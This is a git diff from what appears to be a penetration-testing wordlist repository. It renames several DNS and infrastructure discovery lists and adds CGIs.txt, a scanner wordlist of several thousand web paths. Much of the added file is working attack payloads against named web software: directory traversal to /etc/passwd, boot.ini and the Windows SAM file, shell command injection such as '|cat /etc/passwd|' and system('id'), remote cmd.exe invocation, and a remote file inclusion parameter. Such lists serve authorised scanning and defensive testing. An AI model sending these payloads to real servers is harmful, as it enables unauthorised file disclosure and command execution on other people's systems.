diff --git a/Discovery/DNS/bitquark_subdomains_top100K.txt b/Discovery/DNS/bitquark-subdomains-top100K.txt
similarity index 100%
rename from Discovery/DNS/bitquark_subdomains_top100K.txt
rename to Discovery/DNS/bitquark-subdomains-top100K.txt
diff --git a/Discovery/DNS/deepmagic.com_top500prefixes.txt b/Discovery/DNS/deepmagic.com-top500prefixes.txt
similarity index 100%
rename from Discovery/DNS/deepmagic.com_top500prefixes.txt
rename to Discovery/DNS/deepmagic.com-top500prefixes.txt
diff --git a/Discovery/DNS/deepmagic.com_top50kprefixes.txt b/Discovery/DNS/deepmagic.com-top50kprefixes.txt
similarity index 100%
rename from Discovery/DNS/deepmagic.com_top50kprefixes.txt
rename to Discovery/DNS/deepmagic.com-top50kprefixes.txt
diff --git a/Discovery/DNS/fierce_hostlist.txt b/Discovery/DNS/fierce-hostlist.txt
similarity index 100%
rename from Discovery/DNS/fierce_hostlist.txt
rename to Discovery/DNS/fierce-hostlist.txt
diff --git a/Discovery/DNS/sorted_knock_dnsrecon_fierce_recon-ng.txt b/Discovery/DNS/sortedcombied-knock-dnsrecon-fierce-reconng.txt
similarity index 100%
rename from Discovery/DNS/sorted_knock_dnsrecon_fierce_recon-ng.txt
rename to Discovery/DNS/sortedcombied-knock-dnsrecon-fierce-reconng.txt
diff --git a/Discovery/Infrastructure/common_router_ips.txt b/Discovery/Infrastructure/common-router-ips.txt
similarity index 100%
rename from Discovery/Infrastructure/common_router_ips.txt
rename to Discovery/Infrastructure/common-router-ips.txt
diff --git a/Discovery/Infrastructure/nmap_top1000_ports.txt b/Discovery/Infrastructure/nmap-top1000-ports.txt
similarity index 100%
rename from Discovery/Infrastructure/nmap_top1000_ports.txt
rename to Discovery/Infrastructure/nmap-top1000-ports.txt
diff --git a/Discovery/SNMP/wordlist-common-snmp-community-strings.txt b/Discovery/SNMP/common-snmp-community-strings.txt
similarity index 100%
rename from Discovery/SNMP/wordlist-common-snmp-community-strings.txt
rename to Discovery/SNMP/common-snmp-community-strings.txt
diff --git a/Discovery/Web_Content/CGIs.txt b/Discovery/Web_Content/CGIs.txt
new file mode 100644
index 00000000..3d2f333c
--- /dev/null
+++ b/Discovery/Web_Content/CGIs.txt
@@ -0,0 +1,3388 @@
+TiVoConnect?Command=QueryServer
+TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes
+cgi-bin/cart32.exe
+cgi-bin/classified.cgi
+cgi-bin/download.cgi
+cgi-bin/flexform.cgi
+cgi-bin/flexform
+cgi-bin/lwgate.cgi
+cgi-bin/LWGate.cgi
+cgi-bin/lwgate
+cgi-bin/LWGate
+cgi-bin/perlshop.cgi
+cfappman/index.cfm
+cfdocs/examples/cvbeans/beaninfo.cfm
+cfdocs/examples/parks/detail.cfm
+kboard/
+lists/admin/
+splashAdmin.php
+ssdefs/
+sshome/
+tiki/
+tiki/tiki-install.php
+scripts/samples/details.idc
+_vti_bin/shtml.exe
+cgi-bin/handler.cgi
+cgi-bin/finger
+cgi-bin/finger.pl
+cgi-bin/formmail.cgi
+cgi-bin/formmail.pl
+cgi-bin/formmail
+cgi-bin/get32.exe
+cgi-bin/gm-authors.cgi
+cgi-bin/guestbook/passwd
+cgi-bin/horde/test.php?mode=phpinfo
+cgi-bin/photo/protected/manage.cgi
+cgi-bin/wrap.cgi
+./
+~root/
+cgi-bin/wrap
+forums/@ADMINconfig.php
+forums/config.php
+ganglia/
+guestbook/guestbookdat
+guestbook/pwd
+help/
+hola/admin/cms/htmltags.php?datei=./sec/data.php
+horde/imp/test.php
+horde/test.php?mode=phpinfo
+imp/horde/test.php?mode=phpinfo
+imp/horde/test.php
+index.html.bak
+index.html~
+index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc
+global.inc
+cgi-bin/horde/test.php
+inc/common.load.php
+inc/config.php
+inc/dbase.php
+cgi-bin/visadmin.exe
+cgi-bin/html2chtml.cgi
+cgi-bin/html2wml.cgi
+cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00
+cgi-bin/echo.bat?&dir+c:\
+cgi-bin/excite;IFS=\"$\";/bin/cat
+cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
+cgi-bin/guestbook.cgi
+cgi-bin/guestbook.pl
+cgi-bin/ss
+forumdisplay.php?GLOBALS[]=1&f=2&comma=\".system('id').\"
+guestbook/guestbook.html
+html/cgi-bin/cgicso?query=AAA
+geeklog/users.php
+gb/index.php?login=true
+guestbook/admin.php
+cgi-bin/gH.cgi
+cgi-bin/gm-cplog.cgi
+getaccess
+help.html
+cgi-bin/gm.cgi
+filemanager/filemanager_forms.php
+cgi-bin/AT-admin.cgi
+cgi-bin/auth_data/auth_user_file.txt
+cgi-bin/awstats.pl
+cgi-bin/awstats/awstats.pl
+cgi-bin/blog/mt.cfg
+cgi-bin/cart.pl?db='
+cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
+cgi-bin/mt-static/mt-check.cgi
+cgi-bin/mt/mt-check.cgi
+cfdocs/expeval/openfile.cfm
+index.php/123
+mambo/index.php?Itemid=JUNK(5)
+profile.php?u=JUNK(8)
+ticket.php?id=99999
+vgn/login/1,501,,00.html?cookieName=x--\>
+a%5c.aspx
+cgi-bin/banner.cgi
+cgi-bin/bannereditor.cgi
+cgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
+admin/browse.asp?FilePath=c:\&Opt=2&level=0
+cgi-bin/architext_query.pl
+cgi-bin/bizdb1-search.cgi
+cgi-bin/blog/
+tsweb/
+cgi-bin/blog/mt-load.cgi
+cgi-bin/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
+vgn/performance/TMT
+vgn/performance/TMT/Report
+vgn/performance/TMT/Report/XML
+vgn/performance/TMT/reset
+vgn/ppstats
+vgn/previewer
+vgn/record/previewer
+vgn/stylepreviewer
+vgn/vr/Deleting
+vgn/vr/Editing
+vgn/vr/Saving
+vgn/vr/Select
+scripts/iisadmin/bdir.htr
+scripts/iisadmin/ism.dll
+scripts/tools/ctss.idc
+bigconf.cgi
+billing/billing.apw
+blah_badfile.shtml
+blah-whatever-badfile.jsp
+vgn/style
+scripts/no-such-file.pl
+SiteServer/Admin/commerce/foundation/domain.asp
+SiteServer/Admin/commerce/foundation/driver.asp
+SiteServer/Admin/commerce/foundation/DSN.asp
+SiteServer/admin/findvserver.asp
+SiteServer/Admin/knowledge/dsmgr/default.asp
+cgi-bin/cgiwrap/%3Cfont%20color=red%3E
+cgi-bin/moin.cgi?test
+autologon.html?10514
+basilix/mbox-list.php3
+basilix/message-read.php3
+clusterframe.jsp
+IlohaMail/blank.html
+bb-dnbd/faxsurvey
+cartcart.cgi
+scripts/Carello/Carello.dll
+scripts/tools/dsnform.exe
+scripts/tools/dsnform
+SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp
+SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp
+prd.i/pgen/
+readme.eml
+scripts/httpodbc.dll
+scripts/proxy/w3proxy.dll
+scripts/root.exe?/c+dir+c:\+/OG
+SiteServer/admin/
+siteseed/
+scripts/samples/search/author.idq
+scripts/samples/search/filesize.idq
+scripts/samples/search/filetime.idq
+scripts/samples/search/queryhit.idq
+scripts/samples/search/simple.idq
+pccsmysqladm/incs/dbconnect.inc
+iisadmin/
+password.inc
+PDG_Cart/oder.log
+web-console/ServerInfo.jsp%00
+global.asa
+exchange/lib/AMPROPS.INC
+exchange/lib/DELETE.INC
+exchange/lib/GETREND.INC
+exchange/lib/GETWHEN.INC
+exchange/lib/JSATTACH.INC
+exchange/lib/JSROOT.INC
+exchange/lib/JSUTIL.INC
+exchange/lib/LANG.INC
+exchange/lib/logon.inc
+exchange/lib/PAGEUTIL.INC
+exchange/lib/PUBFLD.INC
+exchange/lib/RENDER.INC
+exchange/lib/SESSION.INC
+ows/restricted%2eshow
+WEB-INF./web.xml
+view_source.jsp
+w-agora/
+vider.php3
+exchange/root.asp?acs=anon
+officescan/cgi/cgiChkMasterPwd.exe
+%NETHOOD%/
+cgi-bin/astrocam.cgi
+cgi-bin/badmin.cgi
+cgi-bin/boozt/admin/index.cgi?section=5&input=1
+cgi-bin/ezadmin.cgi
+cgi-bin/ezboard.cgi
+cgi-bin/ezman.cgi
+cgi-bin/foxweb.dll
+cgi-bin/foxweb.exe
+cgi-bin/mgrqcgi
+cgi-bin/wconsole.dll
+cgi-bin/webplus.exe?about
+pbserver/pbserver.dll
+administrator/gallery/uploadimage.php
+pafiledb/includes/team/file.php
+phpEventCalendar/file_upload.php
+servlet/com.unify.servletexec.UploadServlet
+cgi-win/uploader.exe
+scripts/cpshost.dll
+scripts/repost.asp
+upload.asp
+uploadn.asp
+uploadx.asp
+wa.exe
+basilix/compose-attach.php3
+server/
+cgi-bin/fpsrvadm.exe
+siteminder/smadmin.html
+vgn/ac/data
+vgn/ac/delete
+vgn/ac/edit
+vgn/ac/esave
+vgn/ac/fsave
+vgn/ac/index
+vgn/asp/MetaDataUpdate
+vgn/asp/previewer
+vgn/asp/status
+vgn/asp/style
+vgn/errors
+vgn/jsp/controller
+vgn/jsp/errorpage
+vgn/jsp/initialize
+vgn/jsp/jspstatus
+vgn/jsp/jspstatus56
+vgn/jsp/metadataupdate
+vgn/jsp/previewer
+vgn/jsp/style
+vgn/legacy/edit
+vgn/login
+webtop/wdk/samples/index.jsp
+cgi-bin/.cobalt
+WEB-INF/web.xml
+forum/admin/wwforum.mdb
+fpdb/shop.mdb
+guestbook/admin/o12guest.mdb
+midicart.mdb
+MIDICART/midicart.mdb
+mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb
+news/news.mdb
+newuser?Image=../../database/rbsserv.mdb
+shopdbtest.asp
+shopping300.mdb
+shopping400.mdb
+shoppingdirectory/midicart.mdb
+SilverStream/Meta/Tables/?access-mode=text
+database/db2000.mdb
+cgi-bin/mailit.pl
+cgi-bin/search
+doc/webmin.config.notes
+error/HTTP_NOT_FOUND.html.var
+oem_webstage/cgi-bin/oemapp_cgi
+ADMINconfig.php
+cgi-bin/.access
+cgi-bin/%2e%2e/abyss.conf
+cgi-bin/data/fetch.php?page=
+cgi-bin/empower?DB=whateverwhatever
+cgi-bin/mrtg.cgi?cfg=blah
+cgi-bin/store/agora.cgi?page=whatever33.html
+?mod=node&nid=some_thing&op=view
+?mod=some_thing&op=browse
+article.php?article=4965&post=1111111111
+blah123.php
+categorie.php3?cid=june
+CFIDE/probe.cfm
+contents.php?new_language=elvish&mode=select
+download.php?op=viewdownload
+examples/basic/servlet/HelloServlet
+home.php?arsc_language=elvish
+hostadmin/?page='
+index.php?file=index.php
+jgb_eng_php3/cfooter.php3
+JUNK(5).csp
+modules.php?name=Downloads&d_op=viewdownload
+modules.php?op=modload&name=0&file=0
+modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=
+modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink
+path/nw/article.php?id='
+pw/storemgr.pw
+rtm.log
+scozbook/view.php?PG=whatever
+servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter
+shopa_sessionlist.asp
+simplebbs/users/users.php
+sips/sipssys/users/a/admin/user
+tcb/files/auth/r/root
+typo3conf/
+typo3conf/database.sql
+typo3conf/localconf.php
+vchat/msg.txt
+vgn/license
+web.config
+webamil/test.php?mode=phpinfo
+webcart-lite/config/import.txt
+webcart-lite/orders/import.txt
+webcart/carts/
+webcart/config/
+webcart/config/clients.txt
+webcart/orders/
+webcart/orders/import.txt
+webmail/horde/test.php
+whateverJUNK(4).html
+ws_ftp.ini
+WS_FTP.ini
+cgi-bin/MsmMask.exe
+_mem_bin/auoconfig.asp
+_mem_bin/remind.asp
+exchange/lib/ATTACH.INC
+SiteServer/Admin/knowledge/persmbr/vs.asp
+SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp
+SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp
+SiteServer/Admin/knowledge/persmbr/VsTmPr.asp
+trace.axd
+tvcs/getservers.exe?action=selects1
+whatever.htr
+nsn/fdir.bas:ShowVolume
+nsn/fdir.bas
+servlet/webacc?User.html=noexist
+forum/admin/database/wwForum.mdb
+webmail/blank.html
+jamdb/
+cgi/cgiproc?
+cgi-bin/addbanner.cgi
+cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
+cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
+cgi-bin/shtml.dll
+admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv
+cgi-bin/aglimpse.cgi
+cgi-bin/aglimpse
+cgi-bin/architext_query.cgi
+cgi-local/cgiemail-1.4/cgicso?query=AAA
+cgi-local/cgiemail-1.6/cgicso?query=AAA
+servlet/SchedulerTransfer
+servlet/sunexamples.BBoardServlet
+servlets/SchedulerTransfer
+cgi-bin/cmd.exe?/c+dir
+cgi-bin/cmd1.exe?/c+dir
+cgi-bin/hello.bat?&dir+c:\
+cgi-bin/post32.exe|dir%20c:\
+perl/-e%20print%20Hello
+admin.cgi
+interscan/
+vgn/legacy/save
+IDSWebApp/IDSjsp/Login.jsp
+quikstore.cfg
+quikstore.cgi
+securecontrolpanel/
+siteminder
+webmail/
+Xcelerate/LoginPage.html
+_cti_pvt/
+smg_Smxcfg30.exe?vcc=3560121183d3
+examples/servlets/index.html
+nsn/..%5Cutil/attrib.bas
+nsn/..%5Cutil/chkvol.bas
+nsn/..%5Cutil/copy.bas
+nsn/..%5Cutil/del.bas
+nsn/..%5Cutil/dir.bas
+nsn/..%5Cutil/dsbrowse.bas
+nsn/..%5Cutil/glist.bas
+nsn/..%5Cutil/lancard.bas
+nsn/..%5Cutil/md.bas
+nsn/..%5Cutil/rd.bas
+nsn/..%5Cutil/ren.bas
+nsn/..%5Cutil/send.bas
+nsn/..%5Cutil/set.bas
+nsn/..%5Cutil/slist.bas
+nsn/..%5Cutil/type.bas
+nsn/..%5Cutil/userlist.bas
+nsn/..%5Cweb/env.bas
+nsn/..%5Cweb/fdir.bas
+nsn/..%5Cwebdemo/env.bas
+nsn/..%5Cwebdemo/fdir.bas
+wikihome/action/conflict.php
+cgi-bin/archie
+cgi-bin/calendar.pl
+cgi-bin/calendar
+cgi-bin/date
+cgi-bin/fortune
+cgi-bin/redirect
+cgi-bin/uptime
+cgi-bin/wais.pl
+/
+webtop/wdk/
+SilverStream
+signon
+upd/
+examples/jsp/source.jsp??
+lpt9
+cfcache.map
+cfdocs/cfcache.map
+CVS/Entries
+lpt9.xtp
+mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
+PHPMYADMINdb_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
+asp/sqlqhit.asp
+asp/SQLQHit.asp
+iissamples/issamples/sqlqhit.asp
+iissamples/issamples/SQLQHit.asp
+ISSamples/sqlqhit.asp
+ISSamples/SQLQHit.asp
+junk.aspx
+oc/Search/sqlqhit.asp
+oc/Search/SQLQHit.asp
+search/htx/sqlqhit.asp
+search/htx/SQLQHit.asp
+search/sqlqhit.asp
+search/SQLQHit.asp
+sqlqhit.asp
+SQLQHit.asp
+cgi-bin/com5...................................................................................................................................................................................................
+cgi-bin/com5.java
+cgi-bin/com5.pl
+?Open
+?OpenServer
+catalog.nsf
+cersvr.nsf
+cgi-bin/testing_whatever
+domlog.nsf
+events4.nsf
+log.nsf
+names.nsf
+LOGIN.PWD
+USER/CONFIG.AP
+cgi-bin/mail
+cgi-bin/nph-error.pl
+cgi-bin/post-query
+cgi-bin/query
+cgi-bin/test-cgi.tcl
+cgi-bin/test-env
+.perf
+admin-serv/config/admpw
+test.php%20
+*.*
+cgi-bin/cgi_process
+ht_root/wwwroot/-/local/httpd$map.conf
+JUNK(10)
+local/httpd$map.conf
+tree
+cgi-bin/index.js0x70
+%00/
+%2e/
+%2f/
+%5c/
+index.jsp%00x
+weblogic
+%a%s%p%d
+index.html%20
+852566C90012664F
+hidden.nsf
+mail.box
+open?
+setup.nsf
+statrep.nsf
+webadmin.nsf
+cgi-bin/cgitest.exe
+examples/servlet/AUX
+cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html
+cfdocs/cfmlsyntaxcheck.cfm
+Config1.htm
+contents/extensions/asp/1
+WebAdmin.dll?View=Logon
+cgi-bin/Pbcgi.exe
+cgi-bin/testcgi.exe
+cgi-win/cgitest.exe
+%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
+c/winnt/system32/cmd.exe?/c+dir+/OG
+cgi-bin/snorkerz.bat
+cgi-bin/snorkerz.cmd
+msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c
+msadc/samples/adctest.asp
+nikto.ida
+SUNWmc/htdocs/
+cgi-bin/webfind.exe?keywords=01234567890123456789
+cgi-shl/win-c-sample.exe
+examples/servlet/TroubleShooter
+cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah
+cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah
+goform/CheckLogin?login=root&password=tslinux
+[SecCheck]/..%2f../ext.ini
+[SecCheck]/..%255c..%255c../ext.ini
+[SecCheck]/..%252f..%252f../ext.ini
+cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini
+cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini
+.nsf/../winnt/win.ini
+prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
+query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
+iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
+iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
+default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
+................../config.sys
+cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
+cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini
+cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini
+netget?sid=user&msg=300&file=../../../../../../../../../boot.ini
+netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd
+php/php.exe?c:\winnt\boot.ini
+phpping/index.php?pingto=www.test.com%20|%20dir%20c:\
+scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini
+us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini
+wx/s.dll?d=/boot.ini
+cgi-bin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
+%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini
+servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00
+cgi-bin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
+cgi-bin/stats/statsbrowse.asp?filepath=c:\&Opt=3
+cgi-bin/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
+cgi-bin/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
+cgi-bin/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
+cgi-bin/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
+ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\
+php/php.exe?c:\boot.ini
+../../../../../../../../../boot.ini
+../../../../winnt/repair/sam._
+..\\..\\..\\..\\..\\..\\..\\boot.ini
+//etc/passwd
+//etc/hosts
+///./../.../boot.ini
+.cobalt/sysManage/../admin/.htaccess
+albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd
+autohtml.php?op=modload&mainfile=x&name=/etc/passwd
+atomicboard/index.php?location=../../../../../../../../../../etc/passwd
+current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1
+current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
+dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
+DomainFiles/*//../../../../../../../../../../etc/passwd
+docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini
+ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1
+index.php?download=/winnt/win.ini
+index.php?download=/windows/win.ini
+index.php?download=/etc/passwd
+index.php?|=../../../../../../../../../etc/passwd
+index.php?page=../../../../../../../../../../etc/passwd
+index.php?page=../../../../../../../../../../boot.ini
+index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd
+jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd
+jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini
+k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor
+nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0
+nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0
+phprocketaddin/?page=../../../../../../../../../../boot.ini
+phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd
+phpwebfilemgr/index.php?f=../../../../../../../../../etc
+phptonuke.php?filnavn=/etc/passwd
+put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd
+ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
+support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
+viewpage.php?file=/etc/passwd
+Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
+webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif
+webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif
+cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd
+cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
+cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
+cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
+cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd
+cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
+cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
+cgi-bin/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd
+cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
+cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
+cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
+cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00
+cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00
+cgi-bin/db4web_c/dbdirname//etc/passwd
+cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
+cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+cgi-bin/faxsurvey?cat%20/etc/passwd
+cgi-bin/faqmanager.cgi?toc=/etc/passwd%00
+cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
+cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
+cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
+cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
+cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
+cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
+cgi-bin/htmlscript?../../../../../../../../../../etc/passwd
+cgi-bin/htgrep?file=index.html&hdr=/etc/passwd
+cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
+cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
+cgi-bin/sbcgi/sitebuilder.cgi
+cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
+cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd
+cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
+cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
+cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+cgi-bin/loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
+cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd
+cgi-bin/htsearch?exclude=%60/etc/passwd%60
+cgi-bin/shop.cgi?page=../../../../../../../etc/passwd
+cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd
+cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
+cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
+cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
+cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
+cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
+cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
+cgi-bin/php.cgi?/etc/passwd
+cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd
+cgi-bin/opendir.php?/etc/passwd
+cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd
+cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
+cgi-bin/multihtml.pl?multi=/etc/passwd%00html
+cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
+cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00
+cgi-bin/way-board.cgi?db=/etc/passwd%00
+cgi-bin/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
+cgi-bin/viewsource?/etc/passwd
+cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
+cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
+cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
+cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
+cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00
+cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd%00
+cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
+cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
+cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password%00
+cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd|
+cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd
+servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00
+webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd
+logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|
+cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
+page.cgi?../../../../../../../../../../etc/passwd
+edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
+base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1
+cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00
+cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
+cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
+cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
+cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
+cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
+cgi-bin/webplus?script=../../../../../../../../../../etc/passwd
+cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+athenareg.php?pass=%20;cat%20/etc/passwd
+PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd
+search?NS-query-pat=../../../../../../../../../../etc/passwd
+search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini
+..\..\..\..\..\..\temp\temp.class
+../../../../../../../../../../etc/passwd
+.../.../.../.../.../.../.../.../.../boot.ini
+................../etc/passwd
+%3f.jsp
+%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
